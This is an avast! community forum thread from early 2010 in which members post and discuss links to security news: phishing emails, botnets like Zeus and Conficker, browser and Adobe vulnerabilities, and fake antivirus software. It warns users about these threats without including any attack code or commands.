Another warning for the newbies that might not know better. Notice that it is supposedly from UPS but it is a fake and if opened by the unknowing, you get a virus.
**************************************
EARTHLINK VIRUS BLOCKER MESSAGE STATUS
**************************************
MESSAGE QUARANTINED
Virus Detected: CMU-10763-20100126
Message Details:
From: "UPS Support Jamie Mckinney" <tracking@ups.com>
Subject: UPS Delivery Problem NR 23911.
Date: Tue, 26 Jan 2010 20:04:42 +0200
For your protection, EarthLink Virus Blocker has quarantined a message sent to you because it contains a virus.
***
-
...Another warning for the newbies that might not know better. Notice that it is supposedly from UPS but it is a fake and if opened by the unknowing, you get a virus....
Yes, I got the same warning from Gmail, thanks Google!! Gmail said it did not load that mail from my Yahoo inbox (POP access) and left it there because of a suspicious attachment in that mail.
I downloaded the attachment, scanned it and found this great job from avast! antivirus: http://www.virustotal.com/analisis/a81c322675370b8bfcbc03e012b94b317d3f5a115b820ee04b43bb876ba7226b-1264525820
Title: Message left on server: "UPS Delivery Problem NR 89904."
The message "UPS Delivery Problem NR 89904." from UPS Support Derrick Zimmerman (tracking [at] ups [dot] com) contained a virus or a suspicious attachment. It was therefore not fetched from your account xxxxxx [at] yahoo.com and has been left on the server.
If you wish to write to UPS, just hit reply and send UPS a message.
Thanks,
The Gmail Team
in the above quote I've edited e-mail addresses
-
Hoaxing Facebook
http://www.norman.com/security_center/blog/snorre_fagerland/77558/en
-
TechCrunch hacked twice in 24 hours
http://www.v3.co.uk/v3/news/2256848/techcrunch-hacked-again
Malware infections double on Web pages
http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2010/01/26/BU211BN9KF.DTL
-
Hi malware fighters,
That it is dangerous to leave your desktop unattended, even just for a while, is an open door. See why?
Here: http://ha.ckers.org/blog/20100126/quicky-firefox-bookmarklet-backdoor/
polonus
-
Hi malware fighters,
SpyEye is a hard-to-detect new bot on the market; it costs cybercriminals 500 euro and was to be used, for instance, in combination with the Chinese hack toolkit: http://pandalabs.pandasecurity.com/ms10-002-exploit-constructor/
Mentioned bot is a data stealer and invisible in the Windows process list...
http://malwareint.blogspot.com/2010/01/spyeye-new-bot-on-market.html
The malicious bot industry is getting bigger and bigger, and this is an alarming situation, my good friends.
polonus
-
Google Chrome flagged as insecure by Secunia
http://forum.avast.com/index.php?topic=54533.0
-
Hi malware fighters,
The number of botnets that use HTTP to communicate with infected machines has doubled during the last six months. Traditionally botnets were commanded through Internet Relay Chat (IRC), but that development has stopped. The number of IRC-based botnets stopped growing at approx. 400, while HTTP-based botnets grew from 800 to 1600. That growth has to do with the low cost of HTTP bot-building toolkits, according to Team Cymru, a non-profit anti-cybercrime organisation.
Toolkits
These toolkits are getting more and more functional, and the ease of using the HTTP interface has made botherders leave the IRC platform as a communication channel en masse. HTTP botnets are more and more used for Distributed Denial of Service (DDoS) attacks. "There are different ways to make money from this kind of attack, while other alternative uses of botnets are to be preferred as they carry less risk."
Most Command & Control servers, both for IRC and HTTP, are located in the United States of America. The North of Europe, with the Netherlands, also plays an important role. Despite the fact that IRC-based botnets showed no growth, their number did not go down either. That is why Team Cymru predicts this kind of bot will continue to play a role, but the future lies with the HTTP-based bots. Link: http://www.team-cymru.org/ReadingRoom/Whitepapers/2010/developing-botnets.pdf
polonus
P.S. Another fact is that HTTP-based bots can be easily relocated...and webadmins have monitored port 6667, while HTTP goes more under the detection radar. Default and standard IPS/IDS systems, just through DPI, will filter for "/join"..... and then bye bye botnet. HTTP is more difficult as it looks like legit traffic,
Damian
-
Malware Aims to Evade Windows 7 Safeguards
Windows 7 adds a number of new security features, but social engineering attacks mean that you can’t let your guard down.
http://www.networkworld.com/news/2010/012810-malware-aims-to-evade-windows.html?page=1
-
***
Misplaced warning ...
http://forum.avast.com/index.php?topic=54645.msg462529#msg462529
***
-
Misplaced warning ...
Unfortunately there are many of these still cluttering up the forum. :'(
-
CIA, PayPal under bizarre SSL assault - Plus hundreds of others
http://www.theregister.co.uk/2010/01/29/strange_ssl_web_attack/
-
Hi malware fighter,
Have to post this here as well:
http://forum.avast.com/index.php?topic=54872.0
pol
-
Hi malware fighter,
Have to post this here as well:
http://forum.avast.com/index.php?topic=54872.0
pol
It would take up less Forum real estate if it were only posted here. :)
-
It would take up less Forum real estate if it were only posted here. :)
but, by posting only here, it would not be easy to 'discuss'; with all the different topics it would be confusing. Maybe the better solution is to open a new room (category) in the forum for these threads.
-
but, by posting Only here, it would not be easy to 'discuss'
exactly, don't know why that needs to be repeated again, it's so obvious that a dedicated thread can't be used for discussion at all. Already nice that those starting new threads still drop a note here as well ;)
-
Consolidating into one thread frees up forum clutter.
Posting here and in it's own thread only causes more clutter.
And why can't it be discussed in this thread ???
-
Consolidating into one thread frees up forum clutter.
Posting here and in it's own thread only causes more clutter.
And why can't it be discussed in this thread ???
discussing in this thread, when ten different sorts of warnings about new web threats are posted every day, would be the worst mess ever...weren't you the one asking me (kindly ;D ) one day to avoid commenting on posts in the "updates" thread, isn't it the same here ???
-
No
-
No
why ?
-
Updates are simply notifications of program updates.
Security warnings sometimes require a discussion.
Just trying to keep the pages from scrolling by.
If it doesn't bother you, then be my guest, post away.
-
Updates are simply notifications of program updates.
Security warnings sometimes require a discussion.
Just trying to keep the pages from scrolling by.
If it doesn't bother you, then be my guest, post away.
thanks ;D But I'd rather stick to what I think is the best, and it seems a few others are sharing my views. I can't seriously imagine a discussion about Chrome last vulnerability, suddenly interrupted by three posts about Adobe Flash, and eventually a new discussion starting in the middle of that. That would drive everyone nuts here. And updates can also be discussed by the way :)
-
What ever makes you happy Boss... ;D
-
thanks ;D But I'd rather stick to what I think is the best, and it seems a few others are sharing my views. I can't seriously imagine a discussion about Chrome last vulnerability, suddenly interrupted by three posts about Adobe Flash, and eventually a new discussion starting in the middle of that. That would drive everyone nuts here. And updates can also be discussed by the way :)
agree!
Bob, Logos said it well: imagine you post a spam warning and I post a warning about a new security hole, others want to talk about spam with you and some others want to talk about that security hole with me, how can we do both together? I don't think opening a new thread bothers the site forum resources, but I just think doing that in the general forum together with new users' questions would move that category along too fast and some questions would move to the next page unanswered.
so I think it would be better to have a different category on the forum home page for that.
-
It isn't site resources but site clutter that concerns me.
At present, I can't keep up with all the posts but as I said before, What ever... ( I'm not a moderator so whatever I or any of the others say and do,
really doesn't matter anyway)
-
It isn't site resources but site clutter that concerns me.
At present, I can't keep up with all the posts but as I said before, What ever... ( I'm not a moderator so whatever I or any of the others say and do,
really doesn't matter anyway)
Bob, both your age and forum reputation tell me that I must listen to you and do same what you say ;)
and I only told you my own opinion. :)
-
Hi folks,
Opening up this thread was a good idea of Charley's. I fully agree and try to put the various threats I stumble upon linked here. The only thing I find is that sometimes one misses out on some of the issues and topics treated here, just because they are not obviously in sight, and that is why a lot of visitors apparently do not see them.....
On the other hand I agree with Logos here that the long topic thread gives less room to discuss a particular topic. That is another point.
The "cluttering and resources taken" is not such a good argument, because I only give a link to click through to read the extensive message in the subject thread that I would have posted anyway. One more link and "hi malware fighters... polonus" is not much of eating up resources, well that is m.h.o., and that is why there are different people and different views in this world,
polonus
-
There is a big difference between clutter and resources. One really has nothing to do with the other.
-
Code execution holes in iPhone OS, iPod Touch
Apple has shipped a patch to cover five documented vulnerabilities that expose iPhone and iPod Touch users to malicious hacker attacks
http://blogs.zdnet.com/security/?p=5381&tag=nl.e589
-
Stubborn trojan stashes install file in Windows help
http://www.theregister.co.uk/2010/02/03/help_file_trojan/
Be careful on help files (McAfee Labs Blog)
http://www.avertlabs.com/research/blog/index.php/2010/02/02/be-careful-on-help-files/
-
Most consumers reuse banking passwords on other sites ::)
tell me more about phishing ;D , I mean that's not the same procedure but it just sounds like some people are just asking for it ;D
http://www.theregister.co.uk/2010/02/02/e_banking_password_fail_survey/
-
Use-after-free vulnerability in Adobe
http://www.norman.com/security_center/security_center_archive/2010/77695/no
-
Fake Microsoft Outlook Update Installs Trojan
A malicious spam campaign caught by Panda Labs is using a fake Microsoft Update notice to trick victims into installing a Trojan. While well crafted, the attack still provides dead giveaways.
http://www.networkworld.com/news/2010/020310-fake-microsoft-outlook-update-installs.html?hpg1=bn
-
Fake Firefox site bundles undead adware
http://www.theregister.co.uk/2010/02/03/fake_firefox_download/
Warez backdoor allows hackers to pwn Twitter accounts
http://www.theregister.co.uk/2010/02/03/twitter_phish/
IE Flaw Gives Hackers Access to User Files, Microsoft Says
http://www.pcworld.com/article/188506/ie_flaw_gives_hackers_access_to_user_files_microsoft_says.html
Microsoft confirms new Internet Explorer flaw
http://www.telegraph.co.uk/technology/microsoft/7155664/Microsoft-confirms-new-Internet-Explorer-flaw.html
-
Microsoft confirms new Internet Explorer flaw
http://www.telegraph.co.uk/technology/microsoft/7155664/Microsoft-confirms-new-Internet-Explorer-flaw.html
Microsoft Security Advisory: Vulnerability in Internet Explorer could allow information disclosure
Microsoft has released a Microsoft security advisory about this issue for IT professionals. The security advisory contains additional security-related information. To view the security advisory, visit the following Microsoft Web site:
http://www.microsoft.com/technet/security/advisory/980088.mspx
To have us fix this problem for you, go to the "Fix it for me" section. If you would rather fix this problem yourself, see the workaround section in the security advisory.
http://support.microsoft.com/kb/980088
-
Conficker has done it again........
Conficker virus outbreak at Greater Manchester Police
http://www.sophos.com/blogs/gc/g/2010/02/02/conficker-virus-outbreak-greater-manchester-police/
-
You would think by now that even the police would be ready for conficker... ::)
And they want a direct link to our data... :( (http://forum.avast.com/index.php?topic=55083.msg465735#new)...
-
AplusWebMaster at the Safer-Networking Forums is really good about posting security threats: http://forums.spybot.info/forumdisplay.php?f=28
-
Hi malware fighters,
Unauthorized hackers can now have access to backdoors left in ISP auditing software.
Cisco was rather upfront about this, but for other software we don't even know where it is.
This is to prevent suspects from being warned by their ISP that they are being monitored via backdoors:
http://www.darkreading.com/insiderthreat/security/perimeter/showArticle.jhtml?articleID=222600993
Always thought the Internet was wormholed; now with these 6 issues it is proven,
Exploiting Lawful Intercept to Wiretap the Internet
Many governments require telecommunications companies to provide interfaces that law enforcement can use to monitor their customers' communications. If these interfaces are poorly designed, implemented, or managed they can provide a backdoor for attackers to perform surveillance without lawful authorization. Most lawful intercept technology is proprietary and difficult to peer review. Fortunately, Cisco has published the core architecture of its lawful intercept technology in an Internet Draft and a number of public configuration guides.
This talk will review Cisco's architecture for lawful intercept from a security perspective. The talk will explain how a number of different weaknesses in its design coupled with publicly disclosed security vulnerabilities could enable a malicious person to access the interface and spy on communications without leaving a trace. The talk will explain what steps network operators need to take to protect this interface. The talk will also provide a set of recommendations for the redesign of the interface as well as SNMP authentication in general to better mitigate the security risks.
Warnings were there from 2008:
http://www.forbes.com/2010/02/03/hackers-networking-equipment-technology-security-cisco.html
polonus
-
Aurora Attack - Zero day exploit in IE6
The Aurora attacks, which are known to have originated from China, are a major attack in the recent past which used an Internet Explorer exploit code to attack companies like Google and Adobe and succeeded in stealing some intellectual property.
http://www.norman.com/security_center/security_center_archive/2010/77717/en-us
-
Microsoft slates colossal Windows patch next week
Ties record with 13 security updates, plans to fix 26 bugs in Windows, Office
http://www.computerworld.com/s/article/9152258/Microsoft_slates_colossal_Windows_patch_next_week?source=rss_news
http://www.microsoft.com/technet/security/bulletin/ms10-feb.mspx
-
Microsoft slates colossal Windows patch next week
Ties record with 13 security updates, plans to fix 26 bugs in Windows, Office
http://www.computerworld.com/s/article/9152258/Microsoft_slates_colossal_Windows_patch_next_week?source=rss_news
thanks for the heads up, was expecting something just for IE but it seems more is involved.
-
Microsoft's Mundie calls for 'internet driving licence' :o
http://www.v3.co.uk/v3/news/2257372/microsoft-mundie-calls
-
Microsoft's Mundie calls for 'internet driving licence' :o
http://www.v3.co.uk/v3/news/2257372/microsoft-mundie-calls
yeah ;D will be remembered as a good joke in a few days :D
-
Microsoft's Mundie calls for 'internet driving licence' :o
http://www.v3.co.uk/v3/news/2257372/microsoft-mundie-calls
Not only need a license but they should be re-tested every few years.
It would certainly cut down on the number of infected systems.
-
Microsoft's Mundie calls for 'internet driving licence' :o
http://www.v3.co.uk/v3/news/2257372/microsoft-mundie-calls
Not only need a license but they should be re-tested every few years.
It would certainly cut down on the number of infected systems.
...yeah, and hackers are dumb enough to fail and not get such a license right?
adding: kids would learn and succeed too eventually...and then spread the malware sent to them by hackers, just for fun.
-
If Microsoft is taking this thing seriously, then we all can't use our computers without a license.
I'll just throw my PC in the garbage and enjoy nature instead.
-
I'll just throw my PC in the garbage and enjoy nature instead.
same here :) wondering sometimes if it would be so bad ???
-
Hi malware fighters,
Gumblar and Conficker dominate the malware scene:
http://www.security.nl/image/2555/1
better look here:
http://www.security.nl/popup/2555
pol
P.S. 13% of the malware was Adobe related exploits....
-
Mozilla overlooked malware-laced Firefox add-ons
http://www.theregister.co.uk/2010/02/05/malicious_firefox_extensions/
Two Firefox add-ons available for months on Mozilla's website infected users with malware that stole passwords and opened a backdoor on Windows machines, the open-source browser maker has confirmed.
The add-ons, available on an experimental section of Mozilla's official add-on download site carried trojans that have been detected since 2008 by commercial anti-virus products. And yet they weren't removed until late January and earlier this week because a scanning tool used to vet add-ons during upload failed to catch the malicious files.
-
Fake Firefox Update Pages Push Adware
http://threatcenter.blogspot.com/2010/02/fake-firefox-update-pages-push-adware.html
-
Mozilla overlooked malware-laced Firefox add-ons
The SoThink detection may have been a false positive.
http://blog.mozilla.com/addons/2010/02/04/please-read-security-issue-on-amo/comment-page-1/#comment-45452
"Alan Baxter says:
February 6, 2010 at 11:51 am
It looks like the current scans of the SoThink 4.0 addon may have been false positives. SoThink updated the addon to 4.2 because of false positive reports in May 2008. Did AMO verify that 4.0 actually contained a trojan?
From http://74.125.47.132/search?q=cache:aou1K7snX3QJ:https://addons.mozilla.org/en-US/firefox/addons/versions/6541+site:addons.mozilla.org+sothink+%22version+history%22&cd=1&hl=en&ct=clnk&gl=us:
Version 4.2 — May 16, 2008 — 685 KB
Works with:
* Firefox: 1.5 – 3.0b3
Fixed Bug
* Some of anti-virus softwares misreported that it contained virus.
-
Conficker.........again..... ???
Conficker outbreak infects Leeds hospital servers
http://www.theregister.co.uk/2010/02/09/conficker_nhs_outbreaks/
ZeuS tracker shrinks takedowns from days to minutes
http://www.theregister.co.uk/2010/02/05/zeus_tracker/
Leaky anti-virus defences letting malware through
http://www.theregister.co.uk/2010/02/08/security_scanner_shortcomings/
-
First the police, then the health service...what is next, the fire service?
Seriously though, ESPECIALLY in those areas there should be safeguards against things like that, like no external media or no personal laptops etc. as this seems to be a vector for attack...
-
One Mozilla malware report turned out to be a false positive
Mozilla overlooked malware-laced Firefox add-ons
http://www.theregister.co.uk/2010/02/05/malicious_firefox_extensions/
Two Firefox add-ons available for months on Mozilla's website infected users with malware that stole passwords and opened a backdoor on Windows machines, the open-source browser maker has confirmed.
The add-ons, available on an experimental section of Mozilla's official add-on download site carried trojans that have been detected since 2008 by commercial anti-virus products. And yet they weren't removed until late January and earlier this week because a scanning tool used to vet add-ons during upload failed to catch the malicious files.
Mozilla has announced that their report of a trojan in the SoThink Video Downloader extension was a false positive after all.
http://blog.mozilla.com/addons/2010/02/09/update-on-the-amo-security-issue/
-
One Mozilla malware report turned out to be a false positive
Mozilla overlooked malware-laced Firefox add-ons
http://www.theregister.co.uk/2010/02/05/malicious_firefox_extensions/
Two Firefox add-ons available for months on Mozilla's website infected users with malware that stole passwords and opened a backdoor on Windows machines, the open-source browser maker has confirmed.
The add-ons, available on an experimental section of Mozilla's official add-on download site carried trojans that have been detected since 2008 by commercial anti-virus products. And yet they weren't removed until late January and earlier this week because a scanning tool used to vet add-ons during upload failed to catch the malicious files.
Mozilla has announced that their report of a trojan in the SoThink Video Downloader extension was a false positive after all.
http://blog.mozilla.com/addons/2010/02/09/update-on-the-amo-security-issue/
Wow. I've got to wonder how much of a backlash Mozilla's going to get; IMHO, it's going to be big and well-deserved. First, letting a trojan into addons, even experimental addons, is just plain a bad decision, given there were - and are - tools detecting said trojan. Smearing SoThink - even accidentally - is only going to make it worse.
Maybe Mozilla just had a lot of bad luck, but the circumstances are sure weird.
-
New Russian Botnet Tries to Kill Rival
An upstart Trojan horse program has decided to take on its much-larger rival by stealing data and then removing the malicious program from infected computers.
http://www.nytimes.com/external/idg/2010/02/09/09idg-new-russian-botnet-tries-to-kill-rival-90923.html
-
New Russian Botnet Tries to Kill Rival
An upstart Trojan horse program has decided to take on its much-larger rival by stealing data and then removing the malicious program from infected computers.
http://www.nytimes.com/external/idg/2010/02/09/09idg-new-russian-botnet-tries-to-kill-rival-90923.html
lol Polonus has already mentioned that the first thing a rogue would do is get rid of the competition, to avoid other malware interference...I would add to make sure the victim will send the cash to the winner only :D This seems confirmed here ;D
-
Security chip that does encryption in PCs hacked
http://news.yahoo.com/s/ap/20100208/ap_on_hi_te/us_tec_crypto_chip_cracked;_ylt=AlgYlCohoMwaXKR3qvFz_VwjtBAF;_ylu=X3oDMTJyZzFmdXMxBGFzc2V0A2FwLzIwMTAwMjA4L3VzX3RlY19jcnlwdG9fY2hpcF9jcmFja2VkBGNwb3MDMgRwb3MDNQRzZWMDeW5fdG9wX3N0b3J5BHNsawNzZWN1cml0eWNoaXA
-
***
Certainly not good news, Pondus.
Almost nothing is secure now.
***
-
Very interesting article. An extremely scary one too. Thanks for the link Pondus.
-
Anybody seen this? The Zimuse virus returns:
http://www.thewindowsclub.com/retro-virus-comes-back-to-hit-hard-disk-mbr
It waits 20-40 days, then overwrites the user's MBR and reboots the computer. Result: fatal. (http://www.youtube.com/watch?v=KgjX4LQrkgI shows the virus in action)
Because its installation is pretty much silent, users frequently have no idea what hit them.
-
Windows Activation Technologies Update for Windows 7
http://windowsteamblog.com/blogs/genuinewindows/archive/2010/02/11/windows-activation-technologies-update-for-windows-7.aspx
-
Windows Activation Technologies Update for Windows 7
http://windowsteamblog.com/blogs/genuinewindows/archive/2010/02/11/windows-activation-technologies-update-for-windows-7.aspx
I think this was posted already, may be in the update section, yesterday ;)
-
and here we go again......
Adobe to rush out another critical Reader patch
http://www.computerworld.com/s/article/9156038/Adobe_to_rush_out_another_critical_Reader_patch?source=rss_news
-
Kaspersky defends false detection experiment
http://www.theregister.co.uk/2010/02/10/kaspersky_malware_detection_experiment/
-
Adobe to rush out another critical Reader patch
http://www.computerworld.com/s/article/9156038/Adobe_to_rush_out_another_critical_Reader_patch?source=rss_news
I think this one is in the >> Updates << topic also already.
-
Kaspersky defends false detection experiment
http://www.theregister.co.uk/2010/02/10/kaspersky_malware_detection_experiment/
Sounds like a lot of a**e covering going on at Kaspersky. They know that samples of undetected files are sent to all AVs in VT that didn't detect, part of the VT agreement I believe.
I would say they have shot themselves in the foot. At worst it is almost malicious and at best potentially damaging to their reputation.
-
Kaspersky defends false detection experiment
http://www.theregister.co.uk/2010/02/10/kaspersky_malware_detection_experiment/
Sounds like a lot of a**e covering going on at Kaspersky. They know that samples of undetected files are sent to all AVs in VT that didn't detect, part of the VT agreement I believe.
I would say they have shot themselves in the foot. At worst it is almost malicious and at best potentially damaging to their reputation.
Didn't we go through something like that not too long ago ??? Not very pleasant for the customer or the Company. :'(
-
Hi bob3160,
At the outset of such a policy then, aren't they thinking about the consequences? This is almost infantile behavior or just started on an impulse. But you can almost know for sure an issue like this will seriously backfire later, so why start it in the first place? Unbelievable, the world is a surrealistic place sometimes,
polonus
-
Comodo and Chromium now block major sites with poor certification.
Chromium browser remixed as a security dragon (http://download.cnet.com/8301-2007_4-10453048-12.html?tag=mncol;title)
Source: The Download Blog
-
Hi malware fighters,
Every day spammers send two hundred billion spam messages, mainly through botnets. According to numbers provided by M86 Security, 78% of all spam messages come from the top 5 botnets. The top two are the Rustock and Pushdo botnets, together serving up 54% of total spam.
The number of malicious spam messages, email with a malicious attachment or with a link to a drive-by-download website, grew to three million a day. That means fivefold the 600 million number seen during the first half of the year 2009. "It is important to identify the main spam mailers, so the industry can take action", according to Technical Strategy vice president Bradley Anstis.
Zero-day
The security researcher discovered in the second half of last year that 40% of attacks worked through zero-day security leaks. "One of the biggest problems with zero-days is the time between discovery, in-the-wild abuse, and the launch of a patch by the software vendor."
This so-called "Window of Vulnerability" is getting smaller and smaller all the time, but even when a patch has been issued, users are slow to implement it. Take for instance the so-called MDAC hole, patched during 2006, and still very popular with malcreants,
polonus
-
Zeus Trojan found on 74,000 PCs in global botnet (http://news.cnet.com/8301-27080_3-10455525-245.html?tag=newsEditorsPicksArea.0)
Source: CNET News
-
Ads poisoning – JS:Prontexi (http://blog.avast.com/2010/02/18/ads-poisoning-%E2%80%93-jsprontexi/)
Directly from an Avast! blog entry...
The malware usually spreads through web infections placed on innocent, badly secured websites. The ad infiltration method is growing in popularity alongside website infections. Now we are facing probably the biggest ad poisoning ever made – all important ad services are affected. It means that computers might get infected just by reading your favorite newspaper or by doing a search on famous web indexers. We named the source of this attack JS:Prontexi – JavaScript code which initiates infection on the victim's computer using various vulnerabilities, including the latest PDF exploits.
-
Zeus Trojan found on 74,000 PCs in global botnet
http://news.cnet.com/8301-27080_3-10455525-245.html
Mystery malware nukes US city's Windows PCs
Malicious code wipes out Windows PCs
http://computerworld.co.nz/news.nsf/security/windows-nuked-by-malware-at-city-of-norfolk
-
Conficker is alive and well......
Another NHS hospital stricken with Conficker virus
http://www.theregister.co.uk/2010/02/18/conficker_nhs/
Kneber: An Old Botnet Dressed Up in New Clothes
http://www.pcmag.com/article2/0,2817,2360032,00.asp
Google attacks traced back to Chinese schools
http://www.v3.co.uk/v3/news/2258188/google-attacks-traced-back
-
Almost a year later, Conficker still lurking
http://www.sophos.com/security/threat-spotlight/index.html#threat1
-
(http://i.zdnet.com/blogs/chinagoog.jpg)
Google cyber attacks traced to Chinese schools. (http://blogs.zdnet.com/BTL/?p=30997&tag=nl.e589)
Sorry Pondus,
Didn't see your post. :-[
-
***
Mis-placed botnet warning :
http://forum.avast.com/index.php?topic=55913.msg472331#msg472331
***
-
Not to downplay the Kneber botnet threat in any way.
http://www.sophos.com/blogs/gc/g/2010/02/19/zeus-kneber-botnet-unmasked/
http://www.krebsonsecurity.com/2010/02/zeus-a-virus-known-as-botnet/
Perhaps underlines even more - never go to the internet without adequate protection against malware. The botnets are families that will continue to grow and mutate and grow and on and on and on...
-
Hi mkis,
Part of a solution to the growing problem: http://www.malwaredomains.com/wordpress/?p=671
polonus
-
Thanks Pol.
I've bookmarked the site for my personal reference - ideally placed link for security warnings and notices.
I also found the following under Defense in Depth: IP and Netblock Blocking (in right-hand column)
- anecdotal example but revealing story I thought
http://blog.washingtonpost.com/securityfix/2007/10/taking_on_the_russian_business.html
What a dilemma, I would expect the option to block would be first choice but I suppose they didn't want to lose the business - and then things got out of hand. I wonder how common such situations are in the US.
-
Hi mkis,
Part of a solution to the growing problem: http://www.malwaredomains.com/wordpress/?p=671
Why not use the latest?
aurora, zeus, phishing, pushdo, rogue domains to block
http://www.malwaredomains.com/wordpress/?p=851
Archives
■ February 2010 (9)
http://www.malwaredomains.com/wordpress/?m=201002
-
Thanks YoKenny. You always are up to date, aren't you? I guess Polonus was just posting an instance.
Here is my bookmark http://www.malwaredomains.com/wordpress/
-
Polonus here with a European threat, because of the regulations that made MS come up with an alternative browser screen, an initiative which can be grossly abused by malcreants:
http://www.sophos.com/blogs/gc/g/2010/02/19/european-internet-explorer-users-invited-choose-browser/
D
-
Just made a topic about this, but thought I would post here too anyway.
Modern Warfare 2 servers hacked, Trojan's inserted.
http://www.infinityward.com/forum/viewtopic.php?f=24&t=181646
Oh, now thats just plain evil grr.
-
Polonus here with a European threat, because of the regulations that made MS come up with an alternative browser screen, an initiative which can be grossly abused by malcreants:
http://www.sophos.com/blogs/gc/g/2010/02/19/european-internet-explorer-users-invited-choose-browser/
D
I do worry, however, whether cybercriminals might attempt to take advantage of this initiative by creating bogus browser choice screens that could pop up on innocent users' PCs and potentially lead them to a malicious download.
Polonus,
It's not a current threat, it's a blog post and someones opinion of a possibility of a potential problem.
-
Hi bob3160,
If a benevolent blogger can think this up, why cannot a malcreant? There are also smart cyber criminals, you know. The man in the nicest suit often has the.. eh... most evil mind, often that is....So threats come from where you least expect them. If you want to keep them at bay, prepare yourself,
polonus
-
Hi malware fighters,
A so-called "Chuck Norris"(name mentioned inside the malware code) botnet cracks routers and modems: http://praguemonitor.com/2010/02/16/czech-experts-uncover-global-virus-network
Czech defense malware researchers found the botnet and servers in South America, Europe and China.
Good advice to you all - change that modem or router standard password to be protected, according to Jan Vykopal of Masaryk University,
polonus
-
Devil Mountain Software a product to avoid (http://blogs.zdnet.com/BTL/?p=31024&tag=nl.e539)
-
NOT the real VirusTotal.com
Julio Canto (of VirusTotal fame) has noticed that somebody decided to cash in on the good name of the site with the following domain:
virus-total(dot)in
here (http://sunbeltblog.blogspot.com/2010/02/not-real-virustotalcom.html)
nmb
-
Microsoft has warned Windows users to be on their guard against a piece of rogue antivirus software passing itself off as Microsoft Security Essentials.
Security Essentials 2010 is a piece of software which, Microsoft said, installs a fake virus scanner on your machine and monitors and blocks processes it doesn't like.
http://www.theregister.co.uk/2010/02/26/microsoft_security_essentials_rogue/
http://blogs.technet.com/mmpc/archive/2010/02/24/if-it-calls-itself-security-essentials-2010-then-it-s-possibly-fake-innit.aspx
-
Microsoft investigating new IE browser vulnerability
The company warned that an attacker could host a maliciously crafted web page and run arbitrary code if they could convince a user to visit the web page and then get them to press the F1 key in response to a pop up dialog box.
http://blogs.zdnet.com/security/?p=5560
IE users, thou be warned.
Don't know whether this is posted anywhere, but as far as I know, it's brand new ;)
-
New IE security issue exposed in Windows XP
A new security issue in Internet Explorer has been exposed by a Polish technical research group.
http://www.pcpro.co.uk/news/security/355945/new-ie-security-issue-exposed-in-windows-xp
-
New IE security issue exposed in Windows XP
Please read the previous post. ;)
-
***
Warning of a DOS vulnerability :
http://forum.avast.com/index.php?topic=56422.msg476097#msg476097
***
-
Spam disguised as spam notification
In their constant battle against anti-spam filters, spammers have recently started to camouflage their messages as spam quarantine notifications.
http://www.net-security.org/secworld.php?id=8947
nmb
-
That is hardly a new method, they have been doing this and similar for ages, usually disguised as undeliverable email. The user wants to know what and why and stupidly opens it to find out.
I can't believe this is any real benefit, as using any means of deception should turn the recipient off rather than encourage them to read it. I guess there is more than one born every minute.
-
Hi malware fighters,
Recent zero-days in the framework of the Zero Day Initiative (because software vendors and developers do not take the reported leaks seriously enough): http://www.zerodayinitiative.com/advisories/upcoming/
So keep an eye on this list,
polonus
-
Hi malware fighters,
Using the monoculture Google search engine becomes more and more dangerous, because the Google market share attracts cyber-criminals (malicious search results, fake AV etc. etc.) according to F-Secure's Sean Sullivan. Bing has far fewer potentially malicious search results.
Use Fx with NoScript to be secure, and use another search engine (Ixquick for instance),
Link: http://www.f-secure.com/weblog/
polonus
-
Spain busts global "botnet" masterminds
http://uk.reuters.com/article/idUKTRE6214ST20100303?pageNumber=1&virtualBrandChannel=11700
3 arrested with takedown of huge 'botnet' infecting millions of PCs
http://www.mercurynews.com/business/ci_14498591?source=rss&nclick_check=1
-
Spain busts global "botnet" masterminds
http://uk.reuters.com/article/idUKTRE6214ST20100303?pageNumber=1&virtualBrandChannel=11700
3 arrested with takedown of huge 'botnet' infecting millions of PCs
http://www.mercurynews.com/business/ci_14498591?source=rss&nclick_check=1
very good news ;)
-
Yes :) That easy huh? Incredible
-
Hi malware fighters,
Using the monoculture Google search engine becomes more and more dangerous, because the Google market share attracts cyber-criminals (malicious search results, fake AV etc. etc.) according to F-Secure's Sean Sullivan. Bing has far fewer potentially malicious search results.
Use Fx with NoScript to be secure, and use another search engine (Ixquick for instance),
Link: http://www.f-secure.com/weblog/
polonus
That is the same as saying don't use Windows, use Linux because it's safer.
The actual truth is that Google Search is used far more widely than Bing and therefore is the ideal target for attacks.
Google search itself certainly isn't any less safe than Bing or any other search engine.
-
I will exceptionally agree with Bob, sticking to Google search engine here. Why? it's the best search engine - and by far - and it's rarely (?) mentioned, because it's too obvious ;D As to security, associated with Firefox, you get security alerts for bad sites (from Google).
-
Can't help but feel that Google is just carrying too much now. And what they carry has become too diverse. An enormous pile of garbage in many ways, but saved always by the standout brilliance of the search box (okay, and the engine that powers it). For how much longer can we expect Google search to bear the haphazard weight of the sprawling behemoth? Sergey is often not happy, Schmidt is withdrawing from other responsibilities so he can attend better to the flagship, and where has the other guy got to nowadays? I'm kidding really, but just cos to be too real would be to look at the scale of the damage that could arise if the search engine became compromised. Even just a little bit. And regardless of what anyone says, the team has fallen off the tracks just that bit. I think so anyway. But it has to be said, nothing is insurmountable to the genius that is the Google team. I hope that still stands.
-
Confessions of a Windows 7 pirate
Really good read :
In the interest of research, I’ve been digging into message boards and forums run by unabashed Windows enthusiasts who are intent on breaking Microsoft’s activation technology. I’ve had these forums bookmarked for years and stop in every once in a while just to see what’s new. This time I decided to drop by and actually try some of tools and utilities to see if I could become a pirate, too.
here : http://blogs.zdnet.com/Bott/?p=1817
nmb
-
How FBI, police busted massive botnet
http://www.theregister.co.uk/2010/03/03/mariposa_botnet_bust_analysis/
Mariposa botnet
http://pandalabs.pandasecurity.com/mariposa-botnet/
-
Here is more
Monster botnet held 800,000 people's details
Fourth zombie admin could be in South America
http://www.theregister.co.uk/2010/03/04/mariposa_police_hunt_more_botherders/
New exploit technique nullifies major Windows defense
Google engineer posts sample code to show how to bypass DEP in Windows
http://www.computerworld.com/s/article/9165378/New_exploit_technique_nullifies_major_Windows_defense?taxonomyId=17&pageNumber=1
-
Microsoft Security Bulletin Advance Notification for March 2010
http://www.microsoft.com/technet/security/Bulletin/ms10-mar.mspx
-
Opera 10.x Content-Length Buffer Overflow PoC
http://www.securitylab.ru/poc/391364.php
Sorry for the link in Russian, but it's probably important in any case as exploit code is given.
-
Hi malware fighters,
A major threat is the growing number of maliciously infected trusted and reputable websites; a new security start-up concerned with this threat is Dasient Web Anti-Malware:
http://wam.dasient.com/wam/whydasient_threat
polonus
-
Hi malware fighters,
